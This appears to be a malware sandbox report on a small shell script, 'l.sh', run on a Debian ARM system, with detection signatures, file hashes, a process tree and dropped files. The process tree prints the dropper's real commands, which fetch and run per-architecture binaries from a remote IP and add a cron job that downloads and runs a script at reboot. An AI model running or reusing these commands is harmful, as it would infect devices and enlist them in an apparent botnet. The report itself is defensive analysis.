Overview

overview

10

Static

static

1

l.sh

ubuntu-18.04-amd64

10

l.sh

debian-9-armhf

7

l.sh

debian-9-mips

7

l.sh

debian-9-mipsel

7

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    01-01-2025 16:09

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    l.sh

  • Size

    240B

  • MD5

    e2102b077fa0da3be5a5b07b22a34d20

  • SHA1

    629a840f9cbd82d8126f2e6b26f4668af8757f10

  • SHA256

    6f6de7f166f98d6391f52362327abeae69469b3dd8e09db11c11615a2c5cb31f

  • SHA512

    3db852f800118e0a6343e3d121db6eeb851ae72856ec4e7b07edb665e151811b2b6435706795370550cdeaf8b9816b64d42e6c317a1b6c781660905876873fdf

Score
7/10
defense_evasiondiscoveryexecutionpersistenceprivilege_escalatio

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 9 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 8 IoCs
  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 4 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

    executionpersistenceprivilege_escalatio
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Changes its process name 1 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 2 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/l.sh
    /tmp/l.sh
    1⤵
    • Writes file to tmp directory
    PID:671
    • /usr/bin/killall
      killall -9 dvrLocker
      2⤵
      • Reads runtime system information
      PID:672
    • /bin/rm
      rm -rf upnp
      2⤵
        PID:674
      • /usr/bin/wget
        wget http://103.188.82.218/t/arm -O -
        2⤵
          PID:677
        • /bin/chmod
          chmod 777 upnp
          2⤵
          • File and Directory Permissions Modification
          PID:702
        • /tmp/upnp
          ./upnp tplink.arm
          2⤵
          • Executes dropped EXE
          • Renames itself
          • Changes its process name
          • Reads runtime system information
          PID:703
          • /bin/sh
            sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
            3⤵
            • File and Directory Permissions Modification
            PID:704
            • /usr/bin/crontab
              crontab -
              4⤵
              • Creates/modifies Cron job
              PID:706
            • /usr/bin/crontab
              crontab -l
              4⤵
              • Reads runtime system information
              PID:707
        • /usr/bin/wget
          wget http://103.188.82.218/t/arm5 -O -
          2⤵
            PID:711
          • /bin/chmod
            chmod 777 upnp
            2⤵
            • File and Directory Permissions Modification
            PID:734
          • /tmp/upnp
            ./upnp tplink.arm5
            2⤵
            • Executes dropped EXE
            PID:735
          • /usr/bin/wget
            wget http://103.188.82.218/t/arm6 -O -
            2⤵
              PID:736
            • /bin/chmod
              chmod 777 upnp
              2⤵
              • File and Directory Permissions Modification
              PID:737
            • /tmp/upnp
              ./upnp tplink.arm6
              2⤵
              • Executes dropped EXE
              PID:738
            • /usr/bin/wget
              wget http://103.188.82.218/t/arm7 -O -
              2⤵
                PID:739
              • /bin/chmod
                chmod 777 upnp
                2⤵
                • File and Directory Permissions Modification
                PID:740
              • /tmp/upnp
                ./upnp tplink.arm7
                2⤵
                • Executes dropped EXE
                PID:741
              • /usr/bin/wget
                wget http://103.188.82.218/t/mips -O -
                2⤵
                • System Network Configuration Discovery
                PID:742
              • /bin/chmod
                chmod 777 upnp
                2⤵
                • File and Directory Permissions Modification
                PID:743
              • /tmp/upnp
                ./upnp tplink.mips
                2⤵
                • Executes dropped EXE
                • System Network Configuration Discovery
                PID:744
              • /usr/bin/wget
                wget http://103.188.82.218/t/mpsl -O -
                2⤵
                  PID:745
                • /bin/chmod
                  chmod 777 upnp
                  2⤵
                  • File and Directory Permissions Modification
                  PID:746
                • /tmp/upnp
                  ./upnp tplink.mpsl
                  2⤵
                  • Executes dropped EXE
                  PID:747
                • /usr/bin/wget
                  wget http://103.188.82.218/t/ppc -O -
                  2⤵
                    PID:748
                  • /bin/chmod
                    chmod 777 upnp
                    2⤵
                    • File and Directory Permissions Modification
                    PID:749
                  • /tmp/upnp
                    ./upnp tplink.ppc
                    2⤵
                    • Executes dropped EXE
                    PID:750
                  • /usr/bin/wget
                    wget http://103.188.82.218/t/x86 -O -
                    2⤵
                      PID:751
                    • /bin/chmod
                      chmod 777 upnp
                      2⤵
                      • File and Directory Permissions Modification
                      PID:752
                    • /tmp/upnp
                      ./upnp tplink.x86
                      2⤵
                      • Executes dropped EXE
                      PID:753

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • /tmp/upnp
                    Filesize

                    77KB

                    MD5

                    d09db60a70d5b53b5b53ad39476fd7e8

                    SHA1

                    73a75e5e8200f77d857a7256cc0979077e29241d

                    SHA256

                    36b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165

                    SHA512

                    ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04

                    Download Submit

                  • /tmp/upnp
                    Filesize

                    73KB

                    MD5

                    f812a7b3a877f717eb6e54b843b41848

                    SHA1

                    21ee67d9a9b638621646e1b57fdc0f1eb0bdfa25

                    SHA256

                    9a7e77eff17b6bab95e53989adca31512823cf0c92a342a1b7e2ca445d9bb560

                    SHA512

                    c236138e33d6d68c2bf4a6f5a4289070089b5bdb4ee153bc9f317e6ed5da00cb3b2117c68f427d0d58b072a7d453c728f5471c257e752b3514a1077b6978a732

                    Download Submit

                  • /var/spool/cron/crontabs/tmp.CG9uCL
                    Filesize

                    306B

                    MD5

                    d3c47c0babeefea998caaf4433d1dd9f

                    SHA1

                    f0a1e0a98ab8234bd25033c9a31f14be3a105478

                    SHA256

                    676a2325ae1aa7d75da433cc14f86556afda170b85e99c771f825f9d26c123b5

                    SHA512

                    c8e991657e763bb13907c30dfa1fb176d05517ef42b88e4eef352f10499bb29eabdf4f55bb9869c74968ede5cac8c1d557988d3bb5efec773b1eacf5b1daca4e

                    Download Submit